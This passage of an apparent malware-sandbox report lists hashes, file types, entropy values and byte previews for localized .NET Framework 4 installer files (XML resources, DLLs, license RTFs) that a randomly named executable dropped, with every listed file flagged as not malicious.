                                                            Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9

                                                            C:\6c8944922f7b98d0b6cd82b768\1029\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (660), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80970
                                                            Entropy (8bit):3.7136351704498183
                                                            Encrypted:false
                                                            SSDEEP:384:4w9jRY/svLov/QvQovOLeyndT/jfB7eyNdT9eTiyn15byYOMbqav8qAMrZEXw/Fm:Wt/jPvoZJZ0z
                                                            MD5:0B6ED582EB557573E959E37EBE2FCA6A
                                                            SHA1:82C19C7EAFB28593F453341ECA225873FB011D4C
                                                            SHA-256:8A0DA440261940ED89BAD7CD65BBC941CC56001D9AA94515E346D57B7B0838FC
                                                            SHA-512:ABA3D19F408BD74F010EC49B31A2658E0884661D2EFDA7D999558C90A4589B500570CC80410BA1C323853CA960E7844845729FFF708E3A52EA25F597FAD90759
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.a...n... .p.r.o.g.r.a.m. .n.e.l.z.e. .s.p.u.s.t.i.t. .v. .r.e.~.i.m.u. .k.o.m.p.a.t.i.b.i.l.i.t.y... .D.a.l.a... .i.n.f.o.r.m.a.c.e. .n.a.l.e.z.n.e.t.e. .v. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.s.o.u.b.o.r.u. .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.

                                                            C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.308536555634371
                                                            Encrypted:false
                                                            SSDEEP:384:sIr67PAteQx2PoipahxPh1KuMWp1eWCLXci2jpvsH:sv6CMi2jpvsH
                                                            MD5:62876C2FE28B1B5C434B9FAD80ABE9F9
                                                            SHA1:BE3D479204B8E36933E0EECC250C330E69A06D02
                                                            SHA-256:36E316718C8BBBD7B511E9074FC0EECB9ACD0A9B572F593A5A569CC93276D932
                                                            SHA-512:FFDD2D8DB4AE62EA07178677D8C8745CF54D7EDBE1683478A2C588D5B84EF9EA970E2B1C44E3B8F18B33D189655B0C42D5747392DB97176A38FAB4CBAB3E3F10
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious, Browse
                                                            • Filename: , Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......V.....@.......................................... ..d(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1029\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1029
                                                            Category:dropped
                                                            Size (bytes):3726
                                                            Entropy (8bit):5.271587861695615
                                                            Encrypted:false
                                                            SSDEEP:96:4BfgejTQpTfD/g7OyGBB2nZsEAVxfw8EMpDRI/YFkvvApzdYPBGx2:sfN7OHn2nZsEmf+Oa/c2
                                                            MD5:B02C48825414EDCA106C92182D32BC8A
                                                            SHA1:CF00219D69E3CFF9777BABECE1EE9D8CDC776AC9
                                                            SHA-256:C6147000FC34894C724C09CB69FFCE75DD1263B69D063F75466D70B67B3C80DD
                                                            SHA-512:B8AFE051701189F60789D0340FD15E81491456284305B55C4582D0153A2C8CB25F1EDD05F40B50893C7CBB80EC57FF635D764DB5F56AA2E945CF29E9C550E9BA
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1250\deff0\deflang1029\deflangfe1029{\fonttbl{\f0\fswiss\fprq2\fcharset238 Tahoma;}{\f1\froman\fprq2\fcharset238{\*\fname Times New Roman;}Times New Roman CE;}{\f2\fswiss\fprq2\fcharset238 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 DODATKOV\'c9 LICEN\'c8N\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\'c8NOSTI MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\lang1033\f1\par..\lang1029\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PRO OPERA\'c8N\'cd SYST\'c9M MICROSOFT WINDOWS\par..\pard\brdrb\brdrs\brdrw10\brsp20 A P\'d8IDRU\'8eEN\'c9 JAZYKOV\'c9 SADY\par..\pard\nowidctlpar\sb120\sa120\b0 Licenci k\~tomuto dodatku v\'e1m poskytuje spole\'e8nost Microsoft Corporation (nebo n\'eckter\'e1 z\~jej\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte).\lang1033\b

                                                            C:\6c8944922f7b98d0b6cd82b768\1030\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (700), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77748
                                                            Entropy (8bit):3.5770566057374418
                                                            Encrypted:false
                                                            SSDEEP:384:4wvo3sGYQTjtLCpCggWuUyl+JMcf/zmSmRLAgRQJmS+e/JAu1O2Xx+v:9o8GYQTjtLCYggWuUMe+e/J8
                                                            MD5:69925E463A6FEDCE8C8E1B68404502FB
                                                            SHA1:76341E490A432A636ED721F0C964FD9026773DD7
                                                            SHA-256:5F370D2CCDD5FA316BCE095BF22670123C09DE175B7801D0A77CDB68174AC6B7
                                                            SHA-512:5F61ABEC49E1F9CC44C26B83AA5B32C217EBEBA63ED90D25836F51F810C59F71EC7430DC5338EFBA9BE720F800204891E5AB9A5F5EC1FF51EF46C629482E5220
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.t.i.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.t.i.l.s.t.a.n.d... .D.u. .k.a.n. .f.i.n.d.e. .f.l.e.r.e. .o.p.l.y.s.n.i.n.g.e.r. .i. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.g.t.i.g.t.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.

                                                            C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.237828095883879
                                                            Encrypted:false
                                                            SSDEEP:384:cNX61hALPTIOWWptfeWuLXci2jXHUgyh1J:cQweMi2jXHUgU1J
                                                            MD5:9F0CD8981979154CC2A6393DA42731C5
                                                            SHA1:AFFAFE8CF152C25DF75CF3E6B67B7AA8A4A80056
                                                            SHA-256:30C86AE90DE0EE7D2A637AB7EF7AE450690A55A5EA8C007169BAB57B10F0E013
                                                            SHA-512:036253A9B4718EC38C7784ABA6AA124E4A334170AD13546126B0D746F003A4FC571165DBDA3BC3DD1911C343326CAE22C0A3C0A82A17D7F5943D2F2057E3C060
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......9a....@.......................................... ..$(...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1030\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3314
                                                            Entropy (8bit):5.229229499381171
                                                            Encrypted:false
                                                            SSDEEP:96:MTBfIGPzxT1B9TwDXOC1uJzGTcDC5bhPqljShnEGiBe4YOMpDIbu0L9D+Ogp+Ogj:If/Jqn1uJzGTcDC5bhSljShnEGioDOOa
                                                            MD5:B756C9B475E1E5955D8BF1544DF556F7
                                                            SHA1:03ACD306196D5C0CDFBEB947CE3E018C08FD08CB
                                                            SHA-256:204021CC428C70F76DE750C0B01404E3396EE8602C8F25F44635F6F2BDBF693A
                                                            SHA-512:88E44178770025B960BF2329901B6BEC90115B62D9F44A43FD914AEF687C2FCE7E370D9BA8CAAF9BF930553EB99580C47F8E7FDC0C32FE9A921DD368BF8E4658
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1030\b\f0\fs28 TILL\'c6G TIL LICENSVILK\'c5R FOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1030\f0\fs22 MICROSOFT .NET FRAMEWORK 4 TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\lang1033\par..\lang1030 MICROSOFT .NET FRAMEWORK 4-KLIENTPROFIL TIL MICROSOFT WINDOWS-OPERATIVSYSTEM\par..OG TILKNYTTEDE SPROGPAKKER\lang1033\f1\fs20\par..\pard\nowidctlpar\sb120\sa120\lang1030\b0\f0 Microsoft Corporation (eller, afh\'e6ngigt af hvor De bor, et af dets associerede selskaber) licenserer dette till\'e6g til Dem.\lang1033\b \lang1030\b0 Hvis De har licens til at bruge Microsoft Windows-operativsystemsoftware (som dette till\'e6g g\'e6lder for) ("

                                                            C:\6c8944922f7b98d0b6cd82b768\1031\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (682), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82346
                                                            Entropy (8bit):3.5798945100215325
                                                            Encrypted:false
                                                            SSDEEP:1536:guayUbZwf+2CzQHsjz1VbxzPGnz6solo8xKc6JT/1Sy:JayUtwf+2CzQHshPGnz6solo8xKc6JTd
                                                            MD5:8505219C0A8D950FF07DC699D8208309
                                                            SHA1:7A557356C57F1FA6D689EA4C411E727438AC46DF
                                                            SHA-256:C48986CDB7FE3401234E0A6540EB394C1201846B5BEB1F12F83DC6E14674873A
                                                            SHA-512:7BCDAD0CB4B478068434F4EBD554474B69562DC83DF9A423B54C1701CA3B43C3B92DE09EE195A86C0D244AA5EF96C77B1A08E73F1F2918C8AC7019F8DF27B419
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.a.s. .S.e.t.u.p. .k.a.n.n. .n.i.c.h.t. .i.m. .K.o.m.p.a.t.i.b.i.l.i.t...t.s.m.o.d.u.s. .a.u.s.g.e.f...h.r.t. .w.e.r.d.e.n... .W.e.i.t.e.r.e. .I.n.f.o.r.m.a.t.i.o.n.e.n. .f.i.n.d.e.n. .S.i.e. .i.n. .d.e.r. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.I.n.f.o.d.a.t.e.i.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.

                                                            C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.135663555520085
                                                            Encrypted:false
                                                            SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
                                                            MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
                                                            SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
                                                            SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
                                                            SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P.......D....@.......................................... ..`+...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1031\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3419
                                                            Entropy (8bit):5.19064562442276
                                                            Encrypted:false
                                                            SSDEEP:96:MWBfVBITvyTqDyiRc3E5Zob0MpDmqgH4KYXsY/49Uo2:VffWX5Zm0O3Q32
                                                            MD5:94190970FB79C7085DE2E97AE4630B07
                                                            SHA1:272677F49985098CA0477D6A8C1E70E4BDDB646C
                                                            SHA-256:A448FE5954EC68B7C395DA387545C1664C3F4BAADE021E6157EC142997D93CA2
                                                            SHA-512:7A7EE485D20912FC533E83EAE0F151DC142C2F01051735D1F9B20A7146154A04C8269FC9F71AC82E57925B566E07E716CDED6DB8B11026225CEAAC209311531F
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1031\b\f0\fs20 ERG\'c4NZENDE LIZENZBESTIMMUNGEN F\'dcR MICROSOFT-SOFTWARE\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 F\'dcR MICROSOFT WINDOWS-BETRIEBSSYSTEM\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE F\'dcR MICROSOFT WINDOWS-BETRIEBSSYSTEM\par..UND ZUGEH\'d6RIGE LANGUAGE PACKS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (oder eine andere Microsoft-Konzerngesellschaft, wenn diese an dem Ort, an dem Sie leben, die Software lizenziert) lizenziert diese Softwareerg\'e4nzung an Sie. Wenn Sie \'fcber eine Lizenz f\'fcr Microsoft Windows-Betriebssystem-Software verf\'fcgen (f\'fcr die diese Softwareerg\

                                                            C:\6c8944922f7b98d0b6cd82b768\1032\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (708), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):86284
                                                            Entropy (8bit):4.3740758325121645
                                                            Encrypted:false
                                                            SSDEEP:384:4w+7UVysuXHXeXAehlT++sTGoheXrW4MgcyvF773/xSFVQbleaS8tOnjiJLtchH0:+3OQeHll5PunjiJr
                                                            MD5:3BF8DA35B14FBCC564E03F6342BB71F2
                                                            SHA1:8F9139F0BB813BF95F8C437548738D32848D8940
                                                            SHA-256:39EFE12C689EDFEA041613B0E4D6EC78AFEC8FE38A0E4ADC656591FFEF8F415D
                                                            SHA-512:31B050647BA4BD0C2762D77307E1ED2A324E9B152C06ED496B86EA063CDC18BF2BB1F08D2E9B4AF3429A2BC333D7891338D7535487C83495304A5F78776DBC03
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....... ........... ............. ... ................. ....... ......................... ..... ................... ....................... ........................... ....... ......................... .......................,. ................... ....... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;............. .r.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.

                                                            C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19288
                                                            Entropy (8bit):5.607263971475317
                                                            Encrypted:false
                                                            SSDEEP:384:jwB6VfhGGglsETXrI7k1tcVlUHe3YRPWTBZWwLXci2jXHUQ:jlpGGKQVlhsSLMi2jXHUQ
                                                            MD5:E663B67A66ADF9375D1D183CA5FDD23D
                                                            SHA1:30360546A00FFF0A7C2B47F4B01C89E771F13971
                                                            SHA-256:574FBDEDCDA1F9F34C997AC3F192CBA72A67D6534B2E9AB80A35AB3543621D58
                                                            SHA-512:46E7FFB4889A43059665893ABF1D2B6BF3430A617023FFA91F54AF6D5062444B844D8811ED2D037E756993F733986479E93784AC25C553F70F1CF8D1B67182A3
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........0...............................................P............@.......................................... ..`-...........4..X............................................................................................text...G...........................@..@.rsrc....0... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1032\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):8876
                                                            Entropy (8bit):4.086204739568071
                                                            Encrypted:false
                                                            SSDEEP:192:/foOHY6P6Km5NHMQaEjxPSuHON0SuQI62:R46Pm5Ns0jxpeuQV2
                                                            MD5:2091F5DA2BF884F747103A31D2DC947B
                                                            SHA1:AAD26EB74B793D7DE2F466150F609C276D398FB5
                                                            SHA-256:B7A7F2388600D9D059DCDF300845938E429A0FF16EB03BDECE48825805069B7E
                                                            SHA-512:AE798ACD11E9A4ADD33DA760B46200E24B9F9403BBBFAF6CB45E25193D346BDE3B91C9B79BB7E10E529DEDD824A89D23212745CF9E9E5EBB44319E9DD812C61D
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset161 Tahoma;}{\f1\froman\fprq2\fcharset161{\*\fname Times New Roman;}Times New Roman Greek;}{\f2\fswiss\fprq2\fcharset161 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1032\b\f0\fs20\'d3\'d5\'cc\'d0\'cb\'c7\'d1\'d9\'cc\'c1\'d4\'c9\'ca\'cf\'c9 \'cf\'d1\'cf\'c9 \'c1\'c4\'c5\'c9\'c1\'d3 \'d7\'d1\'c7\'d3\'c7\'d3 \'cb\'cf\'c3\'c9\'d3\'cc\'c9\'ca\'cf\'d5 \'d4\'c7\'d3 MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1032\f0 MICROSOFT .NET FRAMEWORK 4 \'c3\'c9\'c1 \'cb\'c5\'c9\'d4\'cf\'d5\'d1\'c3\'c9\'ca\'cf \'d3\'d5\'d3\'d4\'c7\'cc\'c1 MICROSOFT WINDOWS\lang1033\f1\par..\lang1032\f0\'d0\'d1\'cf\'d6\'c9\'cb \'d0\'d1\'cf\'c3\'d1\'c1\'cc\'cc\'c1\'d4\'cf\'d3-\'d0\'c5\'cb\'c1\'d4\'c7 MICROSOFT .NET FRAMEWORK 4 \'c3\'c9\'c1 \'cb\'c5\'c9\'d4\'cf\'d5\'d1\'c3\'c9\'ca\'cf \'d3\'d5\'d3\

                                                            C:\6c8944922f7b98d0b6cd82b768\1033\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (657), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77232
                                                            Entropy (8bit):3.5669629909438734
                                                            Encrypted:false
                                                            SSDEEP:384:4w6JjgKW5D8U2JhrDheHQTBNgNSdfUGNatvcc7QDBuGdSJgkR6Sqzxu:gJsKKIrDPT7lSJYI
                                                            MD5:326518603D85ACD79A6258886FC85456
                                                            SHA1:F1CEF14BC4671A132225D22A1385936AD9505348
                                                            SHA-256:665797C7840B86379019E5A46227F888FA1A36A593EA41F9170EF018C337B577
                                                            SHA-512:F8A514EFD70E81D0F2F983282D69040BCA6E42F29AA5DF554E6874922A61F112E311AD5D2B719B6CA90012F69965447FB91E8CD4103EFB2453FF160A9062E5D3
                                                            Malicious:false
